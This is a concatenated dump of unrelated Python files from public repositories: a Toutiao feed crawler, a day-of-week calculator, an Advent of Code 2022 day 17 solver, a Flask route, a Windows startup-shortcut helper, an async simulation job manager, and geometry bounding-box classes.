'nr5zYGK%2BxNXD4HCZgfW1ZiHXEo5LHKdYDoB46tVWNXyXGA%2BxHLgct3n%2FcRMHJr5L4oxgM6doKoDMFGYGu2zuYb0DTOyXR'\n                  'OaAbSj0283AxH5J%2FBxI5ebmxGUMTByX2DlAcuvy3uxkYOK7JJgF1ify4C7ILTx%2BYH3FXw%2BCXC18Hiz3gH0PyBSBeRD%2F'\n                  'ifaB7BMyZ3AAAAAA%2F%2F8%3D; qh[360]=1',\n    }\n\n    def __init__(self, params, url):\n        self.params = params\n        self.url = url\n\n    def author_item_requests(self):\n        author_item = requests.get(url=self.url, headers=self.headers, params=self.params, verify=False)\n        print(author_item.text)\n\n\nif __name__ == '__main__':\n    param = {\n        'category': 'profile_all',\n        'visited_uid': '50502346173',\n        'stream_api_version': '88',\n        'count': '20',\n        'offset': '0',\n        'device_id': '3069472387378669',\n        'channel': 'baidu',\n        'aid': '13',\n        'app_name': 'news_article',\n        'version_code': '712',\n        'device_platform': 'android',\n        'device_type': 'YAL-AL00',\n        'os_version': '5.1.1',\n    }\n    # personal homepage profile\n    # urls = 'https://lf.snssdk.com/user/profile/homepage/v7/?user_id=50025817786&refer=all'\n    # article list page (Toutiao Lite)\n    # urls = 'https://is.snssdk.com/pgc/ma_mobile/?page_type=1&max_behot_time=1588833675000&\n    # aid=35&media_id=50044041847&count=10&version=2&as=A1E5FE3BA3EBC83&cp=5EB39BDC18633E1&timestamp=1476282741654'\n    # article list page (Toutiao)\n    urls = 'https://is-hl.snssdk.com/api/feed/profile/v1/?'\n\n    tou_ti_ao = TouTiAo(param, urls)\n    tou_ti_ao.author_item_requests()\n\n\n","repo_name":"Supper0512/tools","sub_path":"crawler/toutiao/toutiao.py","file_name":"toutiao.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71836946705","text":"#QUESTION\n#Compose a program that accepts a date as input and writes the day of the week that date falls on\n\n#your program should accept 3 command-line arguments - m(month), d(day), y(year)\n\nM=input(\"Enter month: \")\nd=int(input(\"Enter the date: \"))\ny=int(input(\"Enter the year: \"))\n\nmonths= ['January', 'February', 'March', 'April', 'May', 'June', 'July','August', 'September', 'October', 'November', 'December']\ndays=['Sunday','Monday','Tuesday','Wednesday',\"Thursday\",'Friday','Saturday']\nm=months.index(M)+1\n\n#Formula for the Gregorian Calendar (integer division is required so the result is a whole weekday index)\ny1=y-(14-m)//12\nx=y1+y1//4 -y1//100 +y1//400\nm1=m+12*((14-m)//12)-2\nd1=(d+x+(31*m1)//12)%7\n\nprint(f\"On {M} {d} of year {y}: the day 
was {days[int(d1)]}\")\n\n\n\n\n","repo_name":"Abhisheksingh734/HackerRankPractice","sub_path":"Creative/dayOfTheweek.py","file_name":"dayOfTheweek.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40618377087","text":"# # Advent of Code - Day 17 - Part One\n\nboard = {}\n\n\nclass Block:\n def __init__(self, x, y, parent):\n self.x = x\n self.y = y\n self.parent = parent\n\n def can_move_left(self):\n global board\n return self.x > 0 and ((self.x - 1, self.y) not in board or board[(self.x - 1, self.y)] == self.parent)\n\n def can_move_right(self):\n return self.x < 6 and ((self.x + 1, self.y) not in board or board[(self.x + 1, self.y)] == self.parent)\n\n def can_move_down(self):\n return self.y > 0 and ((self.x, self.y - 1) not in board or board[(self.x, self.y - 1)] == self.parent)\n\n def move(self, delta_x, delta_y):\n self.x += delta_x\n self.y += delta_y\n\n def move_left(self):\n self.move(-1, 0)\n\n def move_right(self):\n self.move(1, 0)\n\n def move_down(self):\n self.move(0, -1)\n\n\nclass Shape:\n\n def __init__(self, row):\n col = 2\n self.blocks = [Block(col + part[0], row + part[1], self) for part in self.parts]\n self.add_blocks()\n self.shift = {'<': self.move_left, '>': self.move_right}\n\n def can_move_left(self):\n return all([block.can_move_left() for block in self.blocks])\n\n def can_move_right(self):\n return all([block.can_move_right() for block in self.blocks])\n\n def can_move_down(self):\n return all([block.can_move_down() for block in self.blocks])\n\n\n def add_blocks(self):\n for block in self.blocks:\n board[(block.x, block.y)] = self\n\n def clear_blocks(self):\n for block in self.blocks:\n del board[(block.x, block.y)]\n\n def move_left(self):\n if self.can_move_left():\n self.clear_blocks()\n for block in self.blocks:\n block.move_left()\n self.add_blocks()\n\n def move_right(self):\n if self.can_move_right():\n self.clear_blocks()\n for block in self.blocks:\n block.move_right()\n self.add_blocks()\n\n def move_down(self):\n if self.can_move_down():\n self.clear_blocks()\n for block in self.blocks:\n block.move_down()\n self.add_blocks()\n return False, max([block.y for block in self.blocks])\n else:\n return True, max([block.y for block in self.blocks])\n\n def get_height(self):\n return max([block.y for block in self.blocks])\n\n\nclass Minus(Shape):\n def __init__(self, row):\n self.parts = [[0, 0], [1, 0], [2, 0], [3, 0]]\n super().__init__(row)\n\n\nclass Plus(Shape):\n def __init__(self, row):\n self.parts = [[1, 0], [0, 1], [1, 1], [2, 1], [1, 2]]\n super().__init__(row)\n\n\nclass Seven(Shape):\n def __init__(self, row):\n self.parts = [[2, 2], [2, 1], [0, 0], [1, 0], [2, 0]]\n super().__init__(row)\n\n\nclass Ell(Shape):\n def __init__(self, row):\n self.parts = [[0, 0], [0, 1], [0, 2], [0, 3]]\n super().__init__(row)\n\n\nclass Square(Shape):\n def __init__(self, row):\n self.parts = [[0, 0], [0, 1], [1, 0], [1, 1]]\n super().__init__(row)\n\n\ndef result(jets):\n shapes = [Minus, Plus, Seven, Ell, Square]\n cycle = 0\n height = -1\n jet = 0\n prev_height = 0\n\n period = len(jets[0]) * len(shapes)\n number_of_periods = 1000000000000 // period\n remaining_iterations = 1000000000000 % period\n\n i = 0\n done = False\n heights = []\n p = 0\n repeating = False\n\n while not done:\n i += 1\n # Add shape\n current_shape = shapes[cycle](height + 4)\n cycle = (cycle + 1) % len(shapes)\n\n # Shift\n settled = False\n while not settled:\n 
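# One falling-rock step: apply a jet push, then try to move down; the shape settles when it can no longer fall.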
current_shape.shift[jets[0][jet]]()\n jet = (jet + 1) % len(jets[0])\n settled, top = current_shape.move_down()\n\n height = max(top, height)\n\n if not repeating and (i - 5) % period == 0:\n heights.append(height)\n p += 1\n if p == 2:\n pattern = copy_board(height, 10)\n print_board(height, height - 10)\n elif p > 2:\n matching_pattern = copy_board(height, 10)\n if all([pattern[row] == matching_pattern[row] for row in range(10)]):\n print(p)\n print_board(height, height - 10)\n\n period_length = p - 2\n repeating = True\n r = 0\n\n if repeating:\n print(remaining_iterations - r)\n if r == remaining_iterations:\n result = heights[0] + number_of_periods * period_length * (heights[2] - heights[1]) + height - heights[2] + 1\n print(r, result)\n done = True\n r += 1\n\n return result\n\n\ndef print_board(height, rows=-1):\n for row in range(height, rows, -1):\n print(row, \": |\", end='')\n for col in range(7):\n print(\"#\" if (col, row) in board else \" \", end='')\n print(\"|\")\n print()\n\ndef copy_board(height, rows=-1):\n result = ['' for _ in range(rows)]\n for row in range(0, rows):\n result[row] = ''\n for col in range(7):\n result[row] += \"#\" if (col, height-row) in board else \" \"\n return result\n# rocks = [\n# [\n# ' @@@@ ',\n# ' ',\n# ' ',\n# ' '\n# ],\n# [\n# ' @ ',\n# ' @@@ ',\n# ' @ ',\n# ' ',\n# ' ',\n# ' '\n# ],\n# [\n# ' @ ',\n# ' @ ',\n# ' @@@ ',\n# ' ',\n# ' ',\n# ' '\n# ],\n# [\n# ' @ ',\n# ' @ ',\n# ' @ ',\n# ' @ ',\n# ' ',\n# ' ',\n# ' '\n# ],\n# [\n# ' @@ ',\n# ' @@ ',\n# ' ',\n# ' ',\n# ' '\n# ]\n# ]\n#\n#\n# def result(jets):\n# rock = 0\n# old_cave = ['1','2']\n# cave = ['#######']\n# jet = 0\n#\n# print(0)\n#\n# for i in range(2022):\n# # new rock\n#\n# cave[:0] = rocks[rock]\n# rock = (rock + 1) % len(rocks)\n# # [print(layer) for layer in cave]\n# # print(\"----\\n\")\n# print('\\r',i, len(cave), len(old_cave))\n# # input()\n#\n# dropped = True\n# while dropped:\n# if i == 9:\n# print(jet, jets[0][jet])\n# push(cave, jets[0][jet])\n# jet = (jet + 1) % len(jets[0])\n#\n# dropped = drop(cave)\n#\n# if i == 9:\n# [print(layer) for layer in cave]\n# print(\"\\n\")\n#\n# if old_cave and len(old_cave) > len(cave):\n# [print(layer) for layer in old_cave]\n# print(\"\\n\")\n# [print(layer) for layer in cave]\n# print(\"\\n\")\n# quit()\n# old_cave = cave.copy()\n#\n# return len(cave)-1\n#\n#\n# def push(cave, jet):\n# if jet == '<':\n# push = -1\n# check_range = range(1,7)\n# else:\n# push = 1\n# check_range = range(0,6)\n#\n# bottom_row = 0\n# while '@' not in cave[bottom_row]:\n# bottom_row += 1\n#\n# while '@' in cave[bottom_row]:\n# bottom_row += 1\n#\n# stuck = any([(cave[row][0] == '@' and push == -1) or\n# (cave[row][6] == '@' and push == 1) or\n# (cave[row][col] == '@' and cave[row][col+push] == '#')\n# for col in check_range for row in range(0, bottom_row)])\n#\n# if not stuck:\n# for row in range(0, bottom_row):\n# new_row = ''\n# for col in range(0, 7):\n# if 0 <= col - push < 7 and cave[row][col - push] == '@':\n# new_row += '@'\n# elif cave[row][col] == '@':\n# new_row += ' '\n# else:\n# new_row += cave[row][col]\n# cave[row] = new_row\n#\n#\n# def drop(cave):\n# top_row = 0\n# while '#' not in cave[top_row]:\n# top_row += 1\n#\n# bottom_row = 0\n# while '@' not in cave[bottom_row]:\n# bottom_row += 1\n#\n# while '@' in cave[bottom_row]:\n# bottom_row += 1\n#\n# if bottom_row < top_row:\n# del cave[bottom_row]\n# return True\n#\n# if all([\n# cave[row][col] in (' ','@') or cave[row-1][col] in (' ','#')\n# for row in range(top_row, bottom_row + 1)\n# 
for col in range(7)\n#     ]):\n#         for row in range(bottom_row, 0, -1):\n#             new_row = ''\n#             for col in range(7):\n#                 new_row += cave[row-1][col] if cave[row][col] == ' ' else cave[row][col]\n#             cave[row] = new_row\n#         cave[row-1] = cave[row-1].replace('@', ' ')\n#         if '#' not in cave[0]:\n#             del cave[0]\n#     else:\n#         for row in range(0, bottom_row):\n#             cave[row] = cave[row].replace('@', '#')\n#         return False\n#     return True\n#\n","repo_name":"scerruti/AoC2022-python","sub_path":"aoc/day17/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":9009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36695367100","text":"from flask import Flask, render_template, request\n\nimport utils\n\n#app = Flask(__name__)\napp = Flask(__name__, static_url_path='/static')\n#app._static_folder = \"./FYP-22-S4-15/app/static\"\n\n@app.route('/')\n#@app.route('/codeEditor')\ndef codeEditor():\n    return render_template('codeEditor.html')\n\n\n@app.route('/get_stack_overflow_query_search_results', methods=['POST'])\ndef get_stack_overflow_query_search_results():\n    searchText = request.form.get('searchText')\n\n    results = utils.getStackOverflowQuerySearchResults(searchText)\n    return results\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"pythonopolis/pythonopolis.github.io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26211374552","text":"\"\"\"Configure behaviour of program on system start.\"\"\"\nimport pathlib\n\nfrom library import constants\nfrom library.helpers import windows_shortcuts\n\n_STARTUP_PATH = pathlib.WindowsPath(constants.STARTUP_PATH)\n_EXECUTABLE_PATH = pathlib.WindowsPath(constants.EXECUTABLE_PATH)\n\n\ndef add():\n    \"\"\"Add the program to windows startup.\"\"\"\n    windows_shortcuts.create_shortcut(_STARTUP_PATH.joinpath(constants.PROGRAM_NAME + \".lnk\"),\n                                      _EXECUTABLE_PATH,\n                                      arguments=\"-b\")\n\n\ndef remove():\n    \"\"\"Remove the program from windows startup.\"\"\"\n    _STARTUP_PATH.joinpath(constants.PROGRAM_NAME + \".lnk\").unlink()\n\n\ndef is_added() -> bool:\n    \"\"\"Return whether program is added to windows startup.\"\"\"\n    for item in _STARTUP_PATH.iterdir():\n        if windows_shortcuts.is_shortcut(item) and windows_shortcuts.read_shortcut(\n                item).name == constants.PROGRAM_NAME + \".exe\":\n            return True\n    return False\n","repo_name":"jarikmarwede/Start-Menu-Helper","sub_path":"library/helpers/windows_startup.py","file_name":"windows_startup.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"13862138685","text":"import math\nfrom concurrent.futures import ThreadPoolExecutor\nimport random\nimport subprocess\nimport collections\n\nimport tornado.gen\n\nimport exceptions.exceptions as ex\nfrom utils import logger\nfrom services.application import Application\n\n\ndef run_job(pid, job, out=logger.warn):\n    logger.log(\"Starting Simulation Thread.\")\n    logger.log(job[\"command\"])\n    process = subprocess.Popen(job[\"command\"], stdout=subprocess.PIPE,\n                               stderr=subprocess.STDOUT,\n                               universal_newlines=True)\n    for line in iter(process.stdout.readline, ''):\n        if job[\"kill\"] is True:\n            process.kill()\n            raise ex.CancelledSimulationException\n        message = {\n            \"job_id\": pid,\n            \"message\": '{}'.format(line.rstrip())\n        }\n        logger.debug(message)\n        
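# Stream each line of subprocess output to the caller-supplied callback as it arrives.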
out(message, \"output\")\n    process.wait()\n    return process.returncode\n\n\nclass ProcessManager:\n\n    def __init__(self):\n        self.jobs = {\n            'queued': collections.deque(),\n            'running': [],\n        }\n        self.app = Application()\n        self.executor = ThreadPoolExecutor(max_workers=20)\n\n    def generate_random_pid(self):\n        while True:\n            pid = math.floor(random.randrange(100000, 999999))\n            if not (any(proc == pid for proc in self.jobs[\"queued\"]) and\n                    any(proc == pid for proc in self.jobs[\"running\"])):\n                return pid\n\n    async def run_job(self, command, pid=None, out=logger.warn):\n\n        pid = pid if pid else self.generate_random_pid()\n\n        await self.wait_for_queue(pid, out)\n\n        job = {\"pid\": pid, \"executor\": None, \"command\": command, \"kill\": False}\n        self.jobs[\"running\"].append(job)\n        out({\"job_id\": pid, \"status\": \"Running\"}, \"status\")\n        logger.log(\"Starting Job #{}\".format(pid))\n        proc = self.executor.submit(run_job, pid, job, out)\n        job[\"executor\"] = proc\n\n        while proc.running():\n            await tornado.gen.sleep(1)\n\n        exit_code = proc.result()\n\n        self.jobs[\"running\"].remove(job)\n\n        if exit_code == 0:\n            out({\"job_id\": pid, \"status\": \"Completed\"}, \"status\")\n            logger.log(\"Finished Job #{}\".format(pid))\n            return pid\n        else:\n            out({\"job_id\": pid, \"status\": \"Failed\"}, \"status\")\n            out(\"Job #{} Failed\".format(pid), \"error\")\n            logger.log(\"Job #{} Failed\".format(pid))\n            raise ex.ProcessFailureException\n\n    async def wait_for_queue(self, pid, out=logger.warn):\n\n        if len(self.jobs[\"running\"]) >= self.app.config.MAX_SIM_THREADS:\n            self.jobs[\"queued\"].append(pid)\n            logger.log(self.jobs)\n            out({\"job_id\": pid, \"status\": \"Queued\",\n                 \"position\": len(self.jobs[\"queued\"])}, \"status\")\n            while self.jobs[\"queued\"][0] != pid or len(\n                    self.jobs[\"running\"]) >= self.app.config.MAX_SIM_THREADS:\n                await tornado.gen.sleep(\n                    self.app.config.DEFAULT_QUEUE_CHECK_INTERVAL)\n            return self.jobs[\"queued\"].popleft()\n\n    def cancel_job(self, pid):\n        if pid in self.jobs[\"queued\"]:\n            self.jobs[\"queued\"].remove(pid)\n        else:\n            job = next((job for job in self.jobs[\"running\"]\n                        if job[\"pid\"] == pid), None)\n            if job:\n                logger.log(self.jobs[\"running\"])\n                job[\"kill\"] = True\n                logger.log(job[\"executor\"].cancelled())\n                self.jobs[\"running\"].remove(job)\n","repo_name":"cmatheny/simc-api","sub_path":"python/services/process_manager.py","file_name":"process_manager.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23470649363","text":"from collections import namedtuple\r\nfrom typing import Any, Iterable, Tuple, Union\r\n\r\nfrom attrs import define, field, frozen\r\nfrom attrs.validators import instance_of\r\nfrom loguru import logger\r\nimport mercantile\r\nimport math\r\n\r\n# This is intended as a convenient shorthand for now, but it should be better handled.\r\nvalid_float_int_to_float = field(converter=float, validator=instance_of((float, int)))\r\n\r\n_LatLonExtents = namedtuple(\"LatLonExtents\", (\"lat, lon, rv\"))\r\n_xyExtents = namedtuple(\"xyExtents\", (\"x, y, rv\"))\r\n# Extents definitions. 
At some point, if there are more projections needed, well, pyproj4...\r\nLatLonExtents = _LatLonExtents(85.051129, 180, 8)\r\nxyExtents = _xyExtents(20037508.342789244, 20037508.342789244, 8)\r\n\r\n\r\ndef clamp(a: Union[float, int], v: Union[float, int]) -> Union[float, int]:\r\n    \"\"\"Clamps a to [-v, +v]\"\"\"\r\n    assert v >= 0, f\"Clamp value must be positive, not {v}.\"\r\n    return min(max(a, -v), v)\r\n\r\n\r\ndef lat_converter(lat: Union[int, float]) -> float:\r\n    \"\"\"Convenience function for clamp_float_round for lat\"\"\"\r\n    lle = LatLonExtents\r\n    return clamp_float_round(lat, lle.lat, lle.rv)\r\n\r\n\r\ndef lon_converter(lon: Union[int, float]) -> float:\r\n    \"\"\"Convenience function for clamp_float_round for lon\"\"\"\r\n    lle = LatLonExtents\r\n    return clamp_float_round(lon, lle.lon, lle.rv)\r\n\r\n\r\ndef x_xy_converter(x_xy: Union[int, float]) -> float:\r\n    \"\"\"Convenience function for clamp_float_round for x\"\"\"\r\n    xye = xyExtents\r\n    return clamp_float_round(x_xy, xye.x, xye.rv)\r\n\r\n\r\ndef y_xy_converter(y_xy: Union[int, float]) -> float:\r\n    \"\"\"Convenience function for clamp_float_round for y\"\"\"\r\n    xye = xyExtents\r\n    return clamp_float_round(y_xy, xye.y, xye.rv)\r\n\r\n\r\ndef clamp_float_round(\r\n    v: Union[int, float], ex: Union[int, float], rv: int\r\n) -> Union[float, Any]:\r\n    \"\"\"\r\n    Clamps the value v to the extent given as ex, and rounds to rv.\r\n    Args:\r\n        v (Union[int, float]): Value to clamp.\r\n        ex (Union[int, float]): Extent to clamp the value to, inclusive.\r\n        rv (int): Number of decimal places to round to.\r\n    Returns:\r\n        Union[float, Any]: either the rounded, clamped float, or a passthrough to the underlying validator.\r\n    \"\"\"\r\n    try:\r\n        cc = clamp(v, ex)\r\n        r = float(round(cc, rv))\r\n        return r\r\n    except Exception:\r\n        return v\r\n\r\n\r\nlat_field = field(converter=lat_converter, validator=instance_of(float))\r\nlon_field = field(converter=lon_converter, validator=instance_of(float))\r\n\r\nx_field = field(converter=x_xy_converter, validator=instance_of(float))\r\ny_field = field(converter=y_xy_converter, validator=instance_of(float))\r\n\r\n\r\n@frozen(slots=True, weakref_slot=False)\r\nclass BasePoint:\r\n    \"\"\"\r\n    Baseclass with no attributes. Probably don't use this.\r\n    \"\"\"\r\n\r\n    def __iter__(self) -> Iterable[Tuple[float, float]]:\r\n        \"\"\"\r\n        __slots__ contains all the attributes of the class. We only want to iterate over the data containing attrs.\r\n        For the child classes, this means removing the crs. 
For this class, the __weakref__.\r\n        __match_args__ would work better, but it's a Python >=3.10 feature with the latest attrs.\r\n        \"\"\"\r\n        x = [\r\n            getattr(self, s)\r\n            for s in list(self.__slots__)\r\n            if s not in [\"crs\", \"__weakref__\"]\r\n        ]\r\n        return iter(x)\r\n\r\n    def __len__(self) -> int:\r\n        return len([x for x in self.__slots__ if x not in [\"crs\", \"__weakref__\"]])\r\n\r\n    def __getitem__(self, idx: int) -> Union[float, float]:\r\n        try:\r\n            return tuple(self)[idx]\r\n        except Exception as e:\r\n            msg = e.__str__().replace(\"tuple\", type(self).__name__)\r\n            raise e.__class__(msg)\r\n\r\n\r\n@frozen(slots=True)\r\nclass Point(BasePoint):\r\n    \"\"\"x, y point.\"\"\"\r\n\r\n    x: float = valid_float_int_to_float\r\n    y: float = valid_float_int_to_float\r\n\r\n\r\n# Alias for point.\r\nPixel = Point\r\n\r\n\r\n@frozen(slots=True)\r\nclass xyPoint(BasePoint):\r\n    \"\"\"X, Y point with a CRS and bounds clamping.\"\"\"\r\n\r\n    x: float = x_field\r\n    y: float = y_field\r\n    crs: str = field(default=\"EPSG:3857\", init=False)\r\n\r\n\r\n@frozen(slots=True)\r\nclass LatLon(BasePoint):\r\n    \"\"\"lat, lon point with a CRS and bounds clamping.\"\"\"\r\n\r\n    lat: float = lat_field\r\n    lon: float = lon_field\r\n    crs: str = field(default=\"EPSG:4326\", init=False)\r\n\r\n\r\n@define\r\nclass BBoxBase:\r\n    \"\"\"\r\n    Base class for the bounding box. This could be used directly as a generic bounding box, if needed.\r\n    Note that the coordinates are given in x/y form, which is lon/lat form, *not* lat/lon form.\r\n    \"\"\"\r\n\r\n    left: float = valid_float_int_to_float\r\n    top: float = valid_float_int_to_float\r\n    right: float = valid_float_int_to_float\r\n    bottom: float = valid_float_int_to_float\r\n    crs: str = field(default=\"\", validator=instance_of(str))\r\n    point_type: namedtuple = field(default=Point, init=False, repr=False)\r\n\r\n    @property\r\n    def tl(self) -> Point:\r\n        \"\"\"Top Left corner point\"\"\"\r\n        return self.point_type(self.left, self.top)\r\n\r\n    @property\r\n    def br(self) -> Point:\r\n        \"\"\"Bottom Right corner point\"\"\"\r\n        return self.point_type(self.right, self.bottom)\r\n\r\n    @property\r\n    def x_dim(self) -> Union[float, int]:\r\n        \"\"\"x (left-right) dimension\"\"\"\r\n        return max(self.left, self.right) - min(self.left, self.right)\r\n\r\n    @property\r\n    def y_dim(self) -> Union[float, int]:\r\n        \"\"\"y (top-bottom) dimension\"\"\"\r\n        return max(self.top, self.bottom) - min(self.top, self.bottom)\r\n\r\n    @property\r\n    def xy_dims(self) -> Tuple[Union[float, int], Union[float, int]]:\r\n        \"\"\"x and y dimensions\"\"\"\r\n        return self.x_dim, self.y_dim\r\n\r\n    @property\r\n    def area(self) -> int:\r\n        \"\"\"Naive area calculation. 
The crs setting would affect this.\"\"\"\r\n        return self.x_dim * self.y_dim\r\n\r\n    @property\r\n    def center(self) -> Point:\r\n        \"\"\"Center of this bbox.\"\"\"\r\n        c_x = self.left + (self.right - self.left) / 2\r\n        c_y = self.top + (self.bottom - self.top) / 2\r\n        return self.point_type(c_x, c_y)\r\n\r\n    def __iter__(self) -> Iterable[Tuple[int, int, int, int]]:\r\n        return iter((self.left, self.top, self.right, self.bottom))\r\n\r\n    def __eq__(self, cmp: Any) -> bool:\r\n        is_inst = isinstance(cmp, type(self))\r\n        if isinstance(cmp, (tuple, list)) and len(cmp) == 4 or is_inst:\r\n            a, b, c, d = cmp\r\n            eq1 = (a, b, c, d) == (self.left, self.top, self.right, self.bottom)\r\n            eq2 = self.crs == cmp.crs if is_inst else True\r\n            eq3 = self.point_type == cmp.point_type if is_inst else True\r\n            return eq1 and eq2 and eq3\r\n        return False\r\n\r\n    def __ne__(self, cmp: Any) -> bool:\r\n        return not self.__eq__(cmp)\r\n\r\n    def __contains__(self, pnt: Any) -> bool:\r\n        if not isinstance(pnt, self.point_type):\r\n            return False\r\n        pa, pb = pnt\r\n        l, t, r, b = tuple(self)\r\n        return l < pa < r and b < pb < t\r\n\r\n    def __getitem__(self, idx: int) -> Union[float, float]:\r\n        try:\r\n            return tuple(self)[idx]\r\n        except Exception as e:\r\n            msg = e.__str__().replace(\"tuple\", type(self).__name__)\r\n            raise e.__class__(msg)\r\n\r\n    class BoundsError(Exception):\r\n        def __init__(self, message) -> None:\r\n            self.message = message\r\n            super().__init__(self.message)\r\n\r\n\r\n@define\r\nclass BBox(BBoxBase):\r\n    _aliases: dict = field(init=False, default=None, repr=False)\r\n    # crs: str = field(default=\"\", validator=instance_of(str))  # ToDo: CRS should be here, not the base class.\r\n    \"\"\"\r\n    This is a bit weird looking, but the goal is to be able to just drop arbitrary bad input on a BBox, and have it (try to) make something reasonable out of it.\r\n    This means a mix of mandatory args and kwargs, and an optional kwarg.\r\n    ToDo: would be really nice to have the same conversion and validation on this as on the point classes.\r\n    \"\"\"\r\n\r\n    def __init__(self, *args, **kwargs):\r\n        bbox_aliases = {\r\n            (\"_lln\", \"maxy\", \"ymax\", \"north\", \"n\", \"t\", \"up\", \"u\"): \"top\",\r\n            (\"_lls\", \"miny\", \"ymin\", \"south\", \"s\", \"b\", \"down\", \"d\"): \"bottom\",\r\n            (\"_llw\", \"minx\", \"xmin\", \"west\", \"w\", \"l\"): \"left\",\r\n            (\"_lle\", \"maxx\", \"xmax\", \"east\", \"e\", \"r\"): \"right\",\r\n            (\"_llc\", \"srs\"): \"crs\",\r\n        }\r\n        setattr(self, \"_aliases\", bbox_aliases)\r\n        # This works for ASCII only, probably.\r\n        kwargs = {k.lower(): v for k, v in kwargs.items()}\r\n        # Map our kwargs keys to the appropriate argument using the aliases.\r\n        a = {self.lookup(kw): v for kw, v in kwargs.items()}\r\n        # Handle args by turning them into kwargs. This currently assumes that no args and kwargs overlap.\r\n        b = {k: v for k, v in zip((\"left\", \"top\", \"right\", \"bottom\", \"crs\"), args)}\r\n        a.update(b)\r\n\r\n        self.__attrs_init__(**a)\r\n\r\n    # def __attrs_post_init__(self, *args, **kwargs):\r\n    #     \"\"\"\r\n    #     This probably makes more sense as a validator.\r\n    #     But idea is to validate that the bbox is valid.\r\n    #     Rules aren't correct yet.\r\n    #     \"\"\"\r\n    #     err = None\r\n\r\n    #     t_g_b = self.top < self.bottom\r\n    #     t_l_b = self.top > self.bottom\r\n    #     r_g_l = self.right > self.left\r\n    #     r_l_l = self.right < self.left\r\n\r\n    #     if self.top < self.bottom:\r\n    #         err = f\"Top=({self.top}) < bottom=({self.bottom})\"\r\n    #         raise self.BoundsError(err)\r\n    #     elif abs(self.right) > 
abs(self.left):\r\n    #         err = f\"Right=({abs(self.right)}) > left=({abs(self.left)})\"\r\n    #         raise self.BoundsError(err)\r\n    #     elif self.top == self.bottom or self.right == self.left:\r\n    #         err = f\"Lines not supported.\"\r\n    #         raise NotImplementedError(err)\r\n\r\n    def lookup(self, k):\r\n        \"\"\"\r\n        Given k, return which of the 4 attrs it corresponds to.\r\n        \"\"\"\r\n        for a, v in self._aliases.items():\r\n            if k in a or k == v:\r\n                return v\r\n        err = f\"{k} is not a supported alias.\"\r\n        raise TypeError(err)\r\n\r\n\r\n# @frozen\r\n@define\r\nclass LatLonBBox(BBox):\r\n    \"\"\"\r\n    For EPSG:4326, origin at lat, lon (0, 0).\r\n    North: +lat, South: -lat, West: -lon, East: +lon\r\n    \"\"\"\r\n\r\n    left: float = lon_field\r\n    top: float = lat_field\r\n    right: float = lon_field\r\n    bottom: float = lat_field\r\n    crs: str = field(default=\"EPSG:4326\", init=False)\r\n    point_type: LatLon = field(default=LatLon, init=False, repr=False)\r\n\r\n    def __init__(self, *args, **kwargs):\r\n        \"\"\"\r\n        Underlying store is left, top, right, bottom,\r\n        but lat/lon ordering in top (north), left (west), bottom (south), right (east).\r\n        kwargs should get proper position by virtue of the aliases, but args won't.\r\n        \"\"\"\r\n        la = len(args)\r\n        if la == 1 and len(kwargs) == 0 and isinstance(args[0], mercantile.LngLatBbox):\r\n            w, s, e, n = args[0]\r\n            args = (n, w, s, e)\r\n        elif la > 5:\r\n            err = f\"{type(self).__name__} takes from 4 to 5 positional arguments but {la} were given\"\r\n            raise TypeError(err)\r\n        extra_kwargs = {f\"_ll{k}\": v for k, v in zip(\"nwsec\", args)}\r\n        kwargs.update(extra_kwargs)\r\n        super().__init__(**kwargs)\r\n\r\n    @property\r\n    def tl(self) -> Point:\r\n        \"\"\"Top Left corner point\"\"\"\r\n        return self.point_type(self.top, self.left)\r\n\r\n    @property\r\n    def br(self) -> Point:\r\n        \"\"\"Bottom Right corner point\"\"\"\r\n        return self.point_type(self.bottom, self.right)\r\n\r\n    def __iter__(self) -> Iterable[Tuple[int, int, int, int]]:\r\n        return iter((self.top, self.left, self.bottom, self.right))\r\n\r\n    def __str__(self) -> str:\r\n        dirs = [\"north\", \"west\", \"south\", \"east\"]\r\n        vals = [self.top, self.left, self.bottom, self.right]\r\n        dir_vals = \", \".join([f\"{n}={v}\" for n, v in zip(dirs, vals)])\r\n        return f\"LatLonBBox({dir_vals}, crs={self.crs})\"\r\n\r\n    @classmethod\r\n    def from_string(cls, s: str) -> \"LatLonBBox\":\r\n        res = [float(x) for x in s.split(\",\")]\r\n        return LatLonBBox(*res)\r\n\r\n    @classmethod\r\n    def from_wgs84_order(cls, *args: Union[str, list, tuple]) -> \"LatLonBBox\":\r\n        \"\"\"Generates a LatLonBBox from a string, tuple or list in WGS84 ordering.\"\"\"\r\n        if len(args) == 1:\r\n            if isinstance(args[0], str):\r\n                args = args[0].split(\",\")\r\n            else:\r\n                args = args[0]\r\n        if isinstance(args, (list, tuple)) and len(args) == 4:\r\n            args = (args[3], args[0], args[1], args[2])\r\n        args = [float(x) for x in args]\r\n        ll_bbox = cls(*args)\r\n        if tuple([*args]) != tuple(ll_bbox):\r\n            in_bb = f\"({', '.join([str(x) for x in args])})\"\r\n            logger.error(f\"{in_bb} != {tuple(ll_bbox)}\")\r\n            msg = \"input may not be in WGS84 ordering (left, bottom, right, top)\"\r\n            raise ValueError(msg)\r\n        return ll_bbox\r\n\r\n    @property\r\n    def wgs84_order(self) -> tuple[float, float, float, float]:\r\n        return self.left, self.bottom, self.right, self.top\r\n\r\n\r\n@frozen\r\nclass xyBBox(BBox):\r\n    \"\"\"\r\n    For EPSG:3857, origin at lat, lon (0, 0).\r\n    North: +Y, South: -Y, West: -X, East: +X\r\n    \"\"\"\r\n\r\n    left: float = x_field\r\n    top: float = y_field\r\n    
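# x_field/y_field clamp values to the Web Mercator extents and round them via the converters defined above.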
